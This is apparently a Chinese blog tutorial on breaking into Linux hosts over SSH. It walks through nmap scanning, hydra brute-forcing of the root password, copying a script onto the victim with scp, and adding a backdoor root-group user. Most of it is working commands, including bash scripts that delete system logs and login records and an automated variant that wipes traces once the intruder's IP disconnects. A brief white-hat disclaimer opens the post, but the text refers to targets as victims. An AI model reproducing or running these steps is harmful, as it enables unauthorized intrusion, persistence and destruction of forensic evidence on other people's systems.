关注一下,更多精彩等着你!
声明:本文介绍的技术仅供网络安全技术人员及白帽子使用,任何个人或组织不可传播使用相关技术及工具从事违法犯罪行为,一经发现直接上报国家安全机关处理
我的CSDN铁杆粉都知道,下面这条动态是我刚刚进入这个社区时发的,当时还小火了一把,下面有原图
之后我不负众望写了下面这篇文章,然后我便在几天之内收获了900多的粉丝,在这里感谢大家的支持与厚爱,让我们互相帮助、携手共进吧!下面请欣赏原文
准备好清除痕迹的shell脚本?扫描在线的IP?扫描IP22端口?尝试连接?传输shell脚本?正式入侵?执行shell脚本?完成你想要的操作?华丽退出✌欧耶
啥也不知道的
扫描IP
暴力破解
知道用户名密码直接连
成功入侵
点开虚拟机的设置(也可以Ctrl+D)然后找到网络适配器,选择NAT模式
在/var/www/
目录下创建shell脚本,命令:vi /var/www/shell.sh
普通脚本内容:
#!/bin/bash
rm /var/log/secure
echo y
rm /var/log/wtmp
echo y
rm /var/log/utmp
echo y
rm /var/log/btmp
echo y
rm /var/log/messages
echo y
rm /var/spool/mail/root
echo y
rm -- "$0"
自动化脚本内容: 注意这里的IP换成你自己的
#!/bin/bash
readonly your_ip="192.168.70.146"
if [ $(w | grep -c $your_ip) -gt 0 ];
then
sleep 5m
cd /var/www/ && ./shell.sh
else
rm /var/log/secure
echo y
rm /var/log/wtmp
echo y
rm /var/log/utmp
echo y
rm /var/log/btmp
echo y
rm /var/log/messages
echo y
rm /var/spool/mail/root
echo y
rm -- "$0"
fi
然后添加执行权限
chmod +x /var/www/shell.sh
192.168.70.0
网段namp -sP 192.168.70.0/24
发现了两个目标namp -p22 192.168.70.xxx
命令扫描目标机的22端口,如果ssh端口开启便可以尝试连接了现在就要把脚本准备好,入侵成功后第一时间把脚本放进去,否则对方一旦关机下线,你就什么也做不了了,会留下入侵痕迹,很危险
ssh a@192.168.70.141
命令连接开启ssh的IP,注意这里输入的密码是没有显示的,你输完敲回车就行了我试验的用户名是a,试了密码
123456
但是没进去,它让再输一次,我输入456789
就成功了,进去之后会有个中括号把用户名括起来。
注意:此时你一定要确认用户名正确,大小写都不能错,因为就算没有这个用户也会提示你输入密码,然后你就会不断地尝试进入根本不存在的用户,最后自闭了,这个时候你可千万别找我,我好心提醒过你了
第一次连接会问你是否继续,输入yes回车就可以了,密码最多尝试三次,断开之后重新连就行了
w
或who
或whoami
确定一下成功没,在用户名后面会显示出你的IP,如图:警告:进去之后千万别乱动:1.可能引起受害者的注意,人家一查当前登录用户就能知道你的IP。2.你是最高权限,搞坏系统,删除数据无所不能。所以为了自己的后半生随便看看得了。
ssh 192.168.70.141
命令连接开启ssh的IP此时默认登录的
root
用户,默认密码是123456
,一旦你登进去就是最高权限了,想干嘛干嘛
第一次登录会问你确定连接么,输入yes回车就可以了
hydra -l root -P pwd.dic -t 1 -vV -e ns 192.168.70.141 ssh
可以看到正确密码很明显的显示出来了,但是现在别急着连接
scp /var/www/shell.sh root@192.168.70.141:/var/www/
这样的显示基本上就成功了
在确认一下,可以看到已经传过来了
连接上之后你最好再确认一下,然后你就可以想干嘛干嘛了
比如看看他的密码文件
或者创建个root权限的用户,方便下次入侵useradd superman -g root -p 123.com
再或者输出一句话给他个惊喜
有时可能你还没来得及退出对方就关机了,这时你的终端就不能动了,所以最好一连接上对方服务器你就制定好计划任务来执行脚本文件,如下:
直接输入命令at now +3 minutes
然后再手动输入cd /var/www/ && ./shell.sh
Ctrl+D退出即可,如下:
注意:手动输入时不能删除,要一次性输入成功,然后按Ctrl+D,如果出错就重新来一遍
[root@a ~]# at now +3 minutes #执行at并指定执行时刻为现在时间的后两分钟
at> cd /var/www/ && ./shell.sh #手动输入命令并回车
at> <EOT> #Ctrl+D结束输入
job 1 at 2020-02-29 18:07 #显示的任务号及执行时间
[root@a ~]#
如果你连接上就立马定时任务的话,可以将时间定的久一点,千万不要超时退出,否则这个脚本就失效了
使用这个脚本也是最好连接上对方你就开始执行,好处是执行完你就不必担心了,它每五分钟自动检测一次连接状态,当你退出后它检测不到你的IP就会自动执行删除计划,使用方法如下:
输入nohup ./shell.sh &
将脚本隐藏在后台运行,可以输入ps -ef | grep shell.sh
查看进程
受害方也能看到此进程
隐藏在后台的脚本不会影响你退出